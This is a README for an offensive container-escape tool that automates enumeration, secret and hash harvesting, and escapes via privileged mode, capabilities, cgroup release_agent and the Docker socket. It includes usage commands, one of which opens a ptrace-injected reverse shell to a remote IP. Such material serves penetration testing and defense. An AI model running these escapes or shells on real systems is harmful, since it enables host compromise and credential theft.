Share
## https://sploitus.com/exploit?id=4486B82C-43DF-537A-B02D-189F4B1D03A9
# Rambert

__________               ___.                  __   
\______   \_____    _____\_ |__   ____________/  |_ 
 |       _/\__  \  /     \| __ \_/ __ \_  __ \   __\
 |    |   \ / __ \|  Y Y  \ \_\ \  ___/|  | \/|  |  
 |____|_  /(____  /__|_|  /___  /\___  >__|   |__|  
        \/      \/      \/    \/     \/             

 "But, you know, I do not belong here!"

Rambert is a production‑quality framework for container escape, enumeration, and exploitation.

## Overview

`Rambert` is a hands‑on offensive security tool that automates the detection, enumeration, and exploitation of container escape vectors. It is designed for educational purposes and authorized penetration testing in lab environments.

The tool performs comprehensive environment reconnaissance, then guides you through the most promising escape techniques – from privileged containers and capability abuses to Docker socket exploitation and runtime CVEs.

## Features

### πŸ” Enumeration (6 submodules)

- **Platform** – detect container runtime, user, groups, Docker executable, socket, and version.
- **Container** – full container ID, name, IP, DNS, host IP, OS, kernel, architecture, CPU, tools, dangerous capabilities, SSHD, privileged mode, cgroup version, namespaces and host sharing.
- **Mounts** – Docker socket detection and interesting host bind mounts.
- **Files** – sensitive environment variables, root files, home directories, password hashes, and secrets in common files.
- **Containers** – discover other containers/hosts via subnet scanning and port scanning.
- **Host** – port and service scan on the host gateway.

### πŸ’₯ Exploits (3 categories)

- **Privileged**
  - `priv_mount_chroot` (mount host root and chroot)
  - `priv_nsenter` (enter host namespaces)
  - `priv_host_proc` (access host `/proc/1`)
- **Capabilities**
  - `cgroup_v1` (release_agent escape in guided mode)
  - `ptrace` (reverse shell injection)
  - `shocker` (`open_by_handle_at`)
  - `sys_module` (load kernel module)
- **Socket** – create a privileged container via the Docker API.

### 🧠 Chaining

- **Automated guide** – evaluates your environment and prints a step‑by‑step recommendation of which exploits to try, including the exact command, prerequisites, and reasoning.

## Project Structure
```bash
container-escape-kit/
β”œβ”€β”€ cmd/cek/                  # CLI entry point
β”‚   β”œβ”€β”€ main.go
β”‚   β”œβ”€β”€ enum.go               # enumeration subcommands
β”‚   β”œβ”€β”€ exploit.go            # exploit parent command
β”‚   β”œβ”€β”€ exploit_privileged.go # privileged exploits
β”‚   β”œβ”€β”€ exploit_capabilities.go # capability exploits
β”‚   β”œβ”€β”€ exploit_socket.go     # socket exploit
β”‚   └── chain.go              # chaining engine
β”œβ”€β”€ internal/
β”‚   β”œβ”€β”€ enum/                 # enumeration modules
β”‚   β”‚   β”œβ”€β”€ platform.go
β”‚   β”‚   β”œβ”€β”€ container.go
β”‚   β”‚   β”œβ”€β”€ mounts.go
β”‚   β”‚   β”œβ”€β”€ files.go
β”‚   β”‚   β”œβ”€β”€ containerscan.go
β”‚   β”‚   └── hostscan.go
β”‚   β”œβ”€β”€ exploit/              # exploit modules
β”‚   β”‚   β”œβ”€β”€ privileged/
β”‚   β”‚   β”œβ”€β”€ capabilities/
β”‚   β”‚   └── socket/
β”‚   β”œβ”€β”€ chain/                # chaining logic
β”‚   β”œβ”€β”€ types/                # shared types
β”‚   └── utils/                # utilities (capabilities, cgroup, mounts, ptrace, etc.)
β”œβ”€β”€ PoCs/                     # standalone proof‑of‑concept files
```


## Key Qualities

- **Safe by default** – all destructive actions require `--dry-run` and explicit confirmation flags.
- **Modular** – each exploit and enumeration module is self‑contained and extensible.
- **CGO‑free** – pure Go, cross‑compiled static binaries for easy deployment.
- **Use native Linux methods** – interacts with the container in a native Linux manner using `/proc` and `/sys` native file systems.

## Quick Start

### Build

```bash
make build
```

### Enumerate

```bash
# All enumeration modules
./bin/Rambert enum

# Specific submodules
./bin/Rambert enum platform
./bin/Rambert enum container
./bin/Rambert enum mounts
./bin/Rambert enum files
./bin/Rambert enum containers
./bin/Rambert enum host
```

### Exploit

```bash
# List available exploits
./bin/Rambert exploit

# Privileged escapes
./bin/Rambert exploit privileged priv_mount_chroot --dry-run
./bin/Rambert exploit privileged priv_nsenter
./bin/Rambert exploit privileged priv_host_proc

# Capability escapes
./bin/Rambert exploit capabilities ptrace --ip 192.168.1.100 --port 4444
./bin/Rambert exploit capabilities shocker
./bin/Rambert exploit capabilities sys_module --module /path/to/root_module.ko
./bin/Rambert exploit capabilities cgroup_v1

# Docker socket escape
./bin/Rambert exploit socket
```

### Chain (Automated Guide)

```bash
# Generate a step‑by‑step escape recommendation
./bin/Rambert chain
```

## Licensing & Ethics

Do not use this tool against systems you do not own or have explicit permission to test.

## References

[Container Escapes Workshop](https://some-natalie.dev/container-escapes-workshop/)
[HackTricks – Docker Security](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security)
[YakLang – Container Escape Techniques](https://github.com/yaklang/hack-skills/blob/main/skills/container-escape-techniques/SKILL.md)